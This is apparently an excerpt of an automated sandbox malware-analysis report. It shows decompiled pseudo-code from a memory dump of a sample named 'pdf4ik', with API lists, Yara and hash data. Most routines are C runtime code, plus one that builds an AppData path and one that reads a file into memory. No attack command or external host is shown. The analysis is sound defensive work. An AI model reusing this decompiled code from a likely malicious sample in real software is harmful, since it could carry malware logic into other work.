                                        • _malloc.LIBCMT ref: 29DA2F9C
                                        • GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,29D93478,?,?,29D93478), ref: 29DA2FB4
                                        • _free.LIBCMT ref: 29DA2FDD
                                        • _free.LIBCMT ref: 29DA2FF4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorInformationLastLogicalProcessor$FreeHeap_malloc
                                        • String ID:
                                        • API String ID: 1407183230-0
                                        • Opcode ID: 551ff06cc015d8f1905a3f12ef0e499e0980ab24fcaa8db4cc320425a8e9b36a
                                        • Instruction ID: b4401719a9dcfcbc8a689fe9298607b7af11424f40da220b93b7c5d04f836835
                                        • Opcode Fuzzy Hash: 551ff06cc015d8f1905a3f12ef0e499e0980ab24fcaa8db4cc320425a8e9b36a
                                        • Instruction Fuzzy Hash: D9113F32E011246BD7149BA7DC40BAF7764EF81620F20417CEE08D7600EB319A27B2E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8F9C0 Relevance: 10.6, APIs: 7, Instructions: 59stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E29D8F9C0(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v1012;
				void* _v2012;
				char _v3012;
				signed int _t16;
				CHAR* _t41;
				signed int _t47;

				_t16 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t16 ^ _t47;
				E29DB5640( &_v1012, 0, 0x3e8);
				E29DB5640( &_v3012, 0, 0x3e8);
				_t41 =  *0x29dd7dbc; // 0x15a2250
				lstrcatA( &_v3012, _t41);
				E29DB5640( &_v2012, 0, 0x3e8);
				_t10 = (0 |  *0x29dd8500(0x1a, 0, 0,  &_v2012) < 0x00000000) - 1; // -1
				lstrcatA( &_v1012, _t10 &  &_v2012);
				lstrcatA( &_v1012,  &_v3012);
				return E29DADF46(E29D8F640( &_v1012, __edi), __ebx, _v8 ^ _t47,  &_v1012, __edi, __esi, 0);
			}










                                        0x29d8f9c9
                                        0x29d8f9d0
                                        0x29d8f9e1
                                        0x29d8f9f7
                                        0x29d8f9fc
                                        0x29d8fa0d
                                        0x29d8fa21
                                        0x29d8fa4b
                                        0x29d8fa58
                                        0x29d8fa6c
                                        0x29d8fa8a

                                        APIs
                                        • _memset.LIBCMT ref: 29D8F9E1
                                        • _memset.LIBCMT ref: 29D8F9F7
                                        • lstrcatA.KERNEL32(?,015A2250), ref: 29D8FA0D
                                        • _memset.LIBCMT ref: 29D8FA21
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D8FA38
                                        • lstrcatA.KERNEL32(?,-00000001), ref: 29D8FA58
                                        • lstrcatA.KERNEL32(?,?), ref: 29D8FA6C
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F669
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F67F
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F695
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F6AB
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F6C1
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F6D7
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F6ED
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F703
                                          • Part of subcall function 29D8F640: _memset.LIBCMT ref: 29D8F719
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A19F0), ref: 29D8F72E
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A2160), ref: 29D8F742
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A19A0), ref: 29D8F756
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A1B20), ref: 29D8F769
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,015A21D8), ref: 29D8F77D
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?), ref: 29D8F78B
                                          • Part of subcall function 29D8F640: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D8F79D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$lstrcat$FolderPath
                                        • String ID:
                                        • API String ID: 154973558-0
                                        • Opcode ID: a8c907551793eff85331c46ae56f6ce3b9bb624b40be6916526936ee4f73f091
                                        • Instruction ID: 4221cb6dc11b7205c1d9672f906cb275fa853572f50117a467a2e5422a939844
                                        • Opcode Fuzzy Hash: a8c907551793eff85331c46ae56f6ce3b9bb624b40be6916526936ee4f73f091
                                        • Instruction Fuzzy Hash: E0119372D40259ABD715EF60DC55FEE7378FB14B00F44859DB109AA0C1EA74A7099FA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB07FA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E29DB07FA(void* __ebx, void* __eflags, intOrPtr _a4) {
				void* _t9;
				char* _t11;
				char* _t12;
				void* _t16;
				signed int _t17;
				void* _t29;
				char* _t30;
				void* _t31;

				_push(__ebx);
				_t29 = E29DB51D2(__ebx);
				if(_t29 != 0) {
					if( *(_t29 + 0x24) != 0) {
						L7:
						_t30 =  *(_t29 + 0x24);
						if(E29DAE6AF(_t30, 0x86, E29DB07D2(_a4)) != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_t9 = E29DB39A5();
							asm("int3");
							_push(_t30);
							_t31 = _t16;
							if(_t31 != 0 && _t9 != 0 && _t9 != _t31) {
								_push(0x86);
								_t17 = 0x36;
								 *(memcpy(_t9, _t31, _t17 << 2)) =  *_t10 & 0x00000000;
								_t9 = E29DB4D62(_t10);
							}
							return _t9;
						} else {
							_t11 = _t30;
							goto L5;
						}
					} else {
						_t12 = E29DB1F54(0x86, 1);
						_pop(_t16);
						 *(_t29 + 0x24) = _t12;
						if(_t12 != 0) {
							goto L7;
						} else {
							_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t11;
				}
			}











                                        0x29db07ff
                                        0x29db0806
                                        0x29db080c
                                        0x29db081e
                                        0x29db083b
                                        0x29db083e
                                        0x29db0853
                                        0x29db0859
                                        0x29db085a
                                        0x29db085b
                                        0x29db085c
                                        0x29db085d
                                        0x29db085e
                                        0x29db0863
                                        0x29db0866
                                        0x29db0867
                                        0x29db086b
                                        0x29db0875
                                        0x29db0878
                                        0x29db087d
                                        0x29db0881
                                        0x29db0887
                                        0x29db0889
                                        0x29db0855
                                        0x29db0855
                                        0x00000000
                                        0x29db0855
                                        0x29db0820
                                        0x29db0823
                                        0x29db0829
                                        0x29db082a
                                        0x29db082f
                                        0x00000000
                                        0x29db0831
                                        0x29db0831
                                        0x29db0836
                                        0x00000000
                                        0x29db0836
                                        0x29db082f
                                        0x29db080e
                                        0x29db080e
                                        0x29db0837
                                        0x29db083a
                                        0x29db083a

                                        APIs
                                        • __getptd_noexit.LIBCMT ref: 29DB0801
                                          • Part of subcall function 29DB51D2: GetLastError.KERNEL32(?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DB51D6
                                          • Part of subcall function 29DB51D2: ___set_flsgetvalue.LIBCMT ref: 29DB51E4
                                          • Part of subcall function 29DB51D2: __calloc_crt.LIBCMT ref: 29DB51F8
                                          • Part of subcall function 29DB51D2: DecodePointer.KERNEL32(00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DB5212
                                          • Part of subcall function 29DB51D2: GetCurrentThreadId.KERNEL32 ref: 29DB5228
                                          • Part of subcall function 29DB51D2: SetLastError.KERNEL32(00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DB5240
                                        • __calloc_crt.LIBCMT ref: 29DB0823
                                        • __get_sys_err_msg.LIBCMT ref: 29DB0841
                                        • _strcpy_s.LIBCMT ref: 29DB0849
                                        • __invoke_watson.LIBCMT ref: 29DB085E
                                        Strings
                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 29DB080E, 29DB0831
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                        • API String ID: 3117964792-798102604
                                        • Opcode ID: e6dbc857200de43b3e56d1c00060aca87d3f9ea22c11393ec7eef0da240ca9fc
                                        • Instruction ID: 3968675c8db8677343a4684b331562f707312c4cdaf7dd2bdb12622ff693fab2
                                        • Opcode Fuzzy Hash: e6dbc857200de43b3e56d1c00060aca87d3f9ea22c11393ec7eef0da240ca9fc
                                        • Instruction Fuzzy Hash: EBF02176906214BBD3143916DCE1C47715CAB94660B40453EF64BAFE01D921DE03F1E5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB511E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E29DB511E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x29dd1d70);
				E29DB5A50(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x29dc7188;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x29dd5678;
				E29DB60C0(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E29DB51C0();
				E29DB60C0(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x29dd5de0; // 0x2bab2e28
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E29DB4D62( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E29DB5A95(E29DB51C9());
			}







                                        0x29db511e
                                        0x29db511e
                                        0x29db5120
                                        0x29db5125
                                        0x29db512f
                                        0x29db5135
                                        0x29db5138
                                        0x29db513f
                                        0x29db5146
                                        0x29db5149
                                        0x29db514c
                                        0x29db5153
                                        0x29db515a
                                        0x29db5163
                                        0x29db5169
                                        0x29db5170
                                        0x29db5176
                                        0x29db517d
                                        0x29db5184
                                        0x29db518a
                                        0x29db518d
                                        0x29db5190
                                        0x29db5195
                                        0x29db5197
                                        0x29db519c
                                        0x29db519c
                                        0x29db51a2
                                        0x29db51a8
                                        0x29db51b9

                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,29DD1D70,00000008,29DB5226,00000000,00000000,?,?,29DB2035,29DAE069,?,?,29D84BED,00000000), ref: 29DB512F
                                        • __lock.LIBCMT ref: 29DB5163
                                          • Part of subcall function 29DB60C0: __mtinitlocknum.LIBCMT ref: 29DB60D6
                                          • Part of subcall function 29DB60C0: __amsg_exit.LIBCMT ref: 29DB60E2
                                          • Part of subcall function 29DB60C0: EnterCriticalSection.KERNEL32(?,?,?,29DB5168,0000000D), ref: 29DB60EA
                                        • InterlockedIncrement.KERNEL32(29DD5678), ref: 29DB5170
                                        • __lock.LIBCMT ref: 29DB5184
                                        • ___addlocaleref.LIBCMT ref: 29DB51A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                        • String ID: KERNEL32.DLL
                                        • API String ID: 637971194-2576044830
                                        • Opcode ID: 0d693c6ff1a3ae96d8f1ec877cc805dfc952aa10f028159beedac7825b0e8277
                                        • Instruction ID: 132e5ffd8f1100d0c9ffc186b7835a3f37144d3ff85bfde68948539e78a17482
                                        • Opcode Fuzzy Hash: 0d693c6ff1a3ae96d8f1ec877cc805dfc952aa10f028159beedac7825b0e8277
                                        • Instruction Fuzzy Hash: 95016972400B00EAD7209F65D954749BBE0AF20321F50DA0EE497ABA90CBB4A646EB25
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB210A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 69%
                                        			E29DB210A(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t13;
				void* _t16;
				intOrPtr* _t20;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t24 = __ebx;
				_t13 =  *((intOrPtr*)( *_a4));
				if(_t13 == 0xe0434352 || _t13 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E29DB524B(_t24, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E29DB524B(_t24, _t25, __eflags);
						_t5 = _t16 + 0x90;
						 *_t5 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t5;
					}
					goto L6;
				} else {
					_t34 = _t13 - 0xe06d7363;
					if(_t13 != 0xe06d7363) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						 *(E29DB524B(__ebx, __edx, _t34) + 0x90) =  *(_t17 + 0x90) & 0x00000000;
						_push(8);
						_push(0x29dd1ea0);
						E29DB5A50(__ebx, __edi, __esi);
						_t20 =  *((intOrPtr*)(E29DB524B(_t24, __edx, _t34) + 0x78));
						if(_t20 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t20();
							_v8 = 0xfffffffe;
						}
						return E29DB5A95(E29DB2D67(_t24, _t25, _t26, _t27));
					}
				}
			}







                                        0x29db210a
                                        0x29db210a
                                        0x29db210a
                                        0x29db210a
                                        0x29db2114
                                        0x29db211b
                                        0x29db2141
                                        0x29db2148
                                        0x29db214a
                                        0x29db214f
                                        0x29db214f
                                        0x29db214f
                                        0x29db214f
                                        0x00000000
                                        0x29db2124
                                        0x29db2124
                                        0x29db2129
                                        0x29db2155
                                        0x29db2155
                                        0x29db2158
                                        0x29db212b
                                        0x29db2130
                                        0x29db7fdb
                                        0x29db7fdd
                                        0x29db7fe2
                                        0x29db7fec
                                        0x29db7ff1
                                        0x29db7ff3
                                        0x29db7ff7
                                        0x29db8002
                                        0x29db8002
                                        0x29db8013
                                        0x29db8013
                                        0x29db2129

                                        APIs
                                        • __getptd.LIBCMT ref: 29DB212B
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __getptd.LIBCMT ref: 29DB213C
                                        • __getptd.LIBCMT ref: 29DB214A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: MOC$RCC$csm
                                        • API String ID: 803148776-2671469338
                                        • Opcode ID: b9f7d668d92a28e442bc63a73333f99a61fc98b3422507ac304592061299d2ff
                                        • Instruction ID: 417862c1e9d896bb345c1e8aa43b544832aa2910c3034946471082be691627de
                                        • Opcode Fuzzy Hash: b9f7d668d92a28e442bc63a73333f99a61fc98b3422507ac304592061299d2ff
                                        • Instruction Fuzzy Hash: 04E09A36110104AFCF008B60C065B5C32E9BF6A284F0660E9DB0ECFA22C728E642B992
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DBB169 Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E29DBB169(void* __ecx, void* __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				intOrPtr _t33;
				int _t37;
				void* _t40;
				short* _t41;
				short* _t47;
				void* _t48;
				void* _t54;
				int _t56;
				void* _t57;
				void* _t60;
				signed int _t61;
				short* _t62;

				_t54 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t27 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t27 ^ _t61;
				_t47 = 0;
				_v12 = 0;
				if(_a24 == 0) {
					_a24 =  *((intOrPtr*)( *_a4 + 4));
				}
				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
				if(_t56 != _t47) {
					if(__eflags > 0) {
						__eflags = _t56 - 0x7ffffff0;
						if(_t56 <= 0x7ffffff0) {
							_t16 = _t56 + 8; // 0x8
							_t40 = _t56 + _t16;
							__eflags = _t40 - 0x400;
							if(_t40 > 0x400) {
								_t41 = E29DADFE0(_t54, _t56, MultiByteToWideChar, _t40);
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xdddd;
									goto L11;
								}
							} else {
								E29DBBB90(_t40);
								_t41 = _t62;
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xcccc;
									L11:
									_t41 =  &(_t41[4]);
									__eflags = _t41;
								}
							}
							_t47 = _t41;
						}
					}
					__eflags = _t47;
					if(_t47 == 0) {
						goto L3;
					} else {
						E29DB5640(_t47, 0, _t56 + _t56);
						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
						__eflags = _t37;
						if(_t37 != 0) {
							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
						}
						E29DB1729(_t47);
						_t33 = _v12;
					}
				} else {
					L3:
					_t33 = 0;
				}
				_pop(_t57);
				_pop(_t60);
				_pop(_t48);
				return E29DADF46(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
			}






















                                        0x29dbb169
                                        0x29dbb16e
                                        0x29dbb16f
                                        0x29dbb170
                                        0x29dbb177
                                        0x29dbb17b
                                        0x29dbb17f
                                        0x29dbb185
                                        0x29dbb18f
                                        0x29dbb18f
                                        0x29dbb1b5
                                        0x29dbb1b9
                                        0x29dbb1bf
                                        0x29dbb1c1
                                        0x29dbb1c7
                                        0x29dbb1c9
                                        0x29dbb1c9
                                        0x29dbb1cd
                                        0x29dbb1d2
                                        0x29dbb1e8
                                        0x29dbb1ee
                                        0x29dbb1f0
                                        0x29dbb1f2
                                        0x00000000
                                        0x29dbb1f2
                                        0x29dbb1d4
                                        0x29dbb1d4
                                        0x29dbb1d9
                                        0x29dbb1db
                                        0x29dbb1dd
                                        0x29dbb1df
                                        0x29dbb1f8
                                        0x29dbb1f8
                                        0x29dbb1f8
                                        0x29dbb1f8
                                        0x29dbb1dd
                                        0x29dbb1fb
                                        0x29dbb1fb
                                        0x29dbb1c7
                                        0x29dbb1fd
                                        0x29dbb1ff
                                        0x00000000
                                        0x29dbb201
                                        0x29dbb208
                                        0x29dbb21d
                                        0x29dbb21f
                                        0x29dbb221
                                        0x29dbb231
                                        0x29dbb231
                                        0x29dbb235
                                        0x29dbb23a
                                        0x29dbb23d
                                        0x29dbb1bb
                                        0x29dbb1bb
                                        0x29dbb1bb
                                        0x29dbb1bb
                                        0x29dbb241
                                        0x29dbb242
                                        0x29dbb243
                                        0x29dbb24f

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,0000009C,00000000,00000000,00000003,00000001,00000000,?,?,?,29DBB27E,?,00000001,?), ref: 29DBB1B3
                                        • _malloc.LIBCMT ref: 29DBB1E8
                                        • _memset.LIBCMT ref: 29DBB208
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,0000009C,?,00000001,0000009C,?,00000008,29DB0DC5,0000009C), ref: 29DBB21D
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 29DBB22B
                                        • __freea.LIBCMT ref: 29DBB235
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                        • String ID:
                                        • API String ID: 525495869-0
                                        • Opcode ID: 29d147e93ac0e972b264408aba7ec6da5b039d74c7277eba7bb238c3f0d194b1
                                        • Instruction ID: 2edd9de064fa3f5c03ba7e8b43b9586476cb82e47db0e24e1b69d486e788ffe9
                                        • Opcode Fuzzy Hash: 29d147e93ac0e972b264408aba7ec6da5b039d74c7277eba7bb238c3f0d194b1
                                        • Instruction Fuzzy Hash: C131717160024AFFDB009F65DC90DAF7BA9EF18294F10442EF906DB550D638DD62EB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D99120 Relevance: 9.1, APIs: 6, Instructions: 63filememoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E29D99120(CHAR* __eax, long* __ebx, void** _a4) {
				long _v12;
				intOrPtr _v20;
				long _v24;
				long _t15;
				void* _t16;
				void* _t29;
				signed int _t30;

				_t30 = 0;
				_t29 = CreateFileA(__eax, 0x80000000, 1, 0, 3, 0, 0);
				if(_t29 == 0 || _t29 == 0xffffffff) {
					L8:
					return _t30;
				} else {
					_push( &_v24);
					_push(_t29);
					if( *0x29dd836c() != 0 && _v20 == 0) {
						_t15 = _v24;
						 *__ebx = _t15;
						_t16 = LocalAlloc(0x40, _t15);
						 *_a4 = _t16;
						if(_t16 != 0) {
							_t30 = ReadFile(_t29, _t16,  *__ebx,  &_v12, 0) & (0 |  *__ebx == _v12);
							if(_t30 == 0) {
								LocalFree( *_a4);
							}
						}
					}
					CloseHandle(_t29);
					goto L8;
				}
			}










                                        0x29d99128
                                        0x29d9913d
                                        0x29d99141
                                        0x29d991a7
                                        0x29d991ad
                                        0x29d99148
                                        0x29d9914b
                                        0x29d9914c
                                        0x29d99155
                                        0x29d9915c
                                        0x29d99162
                                        0x29d99164
                                        0x29d9916d
                                        0x29d99171
                                        0x29d9918f
                                        0x29d99191
                                        0x29d99199
                                        0x29d99199
                                        0x29d99191
                                        0x29d99171
                                        0x29d991a0
                                        0x00000000
                                        0x29d991a0

                                        APIs
                                        • CreateFileA.KERNEL32(29D9F877,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,D9555F04,00000008,00000000,00000000), ref: 29D99137
                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D9914D
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99164
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF), ref: 29D9917D
                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99199
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D991A0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: fe034804050be5b3e56b78bdee2c669a800398bcb7b2c808b7d4574786830df8
                                        • Instruction ID: 8055f6a26c1ee1cfdb5e66f2b515c6004172f7fff5269c436b376f47269aea16
                                        • Opcode Fuzzy Hash: fe034804050be5b3e56b78bdee2c669a800398bcb7b2c808b7d4574786830df8
                                        • Instruction Fuzzy Hash: BB115172610111BBEB15AFB5DC4CEAB7B7DEF45AA0F004258F905E7280D6349942D6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB23CD Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E29DB23CD(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x29dd1c30);
				E29DB5A50(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E29DB0650(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E29DB524B(__ecx, __edx, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E29DB524B(_t48, __edx, _t61) + 0x8c));
				 *((intOrPtr*)(E29DB524B(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E29DB524B(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E29DB06F5(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E29DB24F3(_t48, _t53, _t55, _t57, _t61);
				return E29DB5A95( *((intOrPtr*)(_t58 - 0x1c)));
			}







                                        0x29db23cd
                                        0x29db23cd
                                        0x29db23cd
                                        0x29db23cf
                                        0x29db23d4
                                        0x29db23d9
                                        0x29db23db
                                        0x29db23de
                                        0x29db23e1
                                        0x29db23e4
                                        0x29db23eb
                                        0x29db23fc
                                        0x29db240a
                                        0x29db2418
                                        0x29db2420
                                        0x29db242e
                                        0x29db2434
                                        0x29db243b
                                        0x29db243e
                                        0x29db2454
                                        0x29db2457
                                        0x29db24cc
                                        0x29db24d3
                                        0x29db24da
                                        0x29db24e7

                                        APIs
                                        • __CreateFrameInfo.LIBCMT ref: 29DB23F5
                                          • Part of subcall function 29DB0650: __getptd.LIBCMT ref: 29DB065E
                                          • Part of subcall function 29DB0650: __getptd.LIBCMT ref: 29DB066C
                                        • __getptd.LIBCMT ref: 29DB23FF
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __getptd.LIBCMT ref: 29DB240D
                                        • __getptd.LIBCMT ref: 29DB241B
                                        • __getptd.LIBCMT ref: 29DB2426
                                        • _CallCatchBlock2.LIBCMT ref: 29DB244C
                                          • Part of subcall function 29DB06F5: __CallSettingFrame@12.LIBCMT ref: 29DB0741
                                          • Part of subcall function 29DB24F3: __getptd.LIBCMT ref: 29DB2502
                                          • Part of subcall function 29DB24F3: __getptd.LIBCMT ref: 29DB2510
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
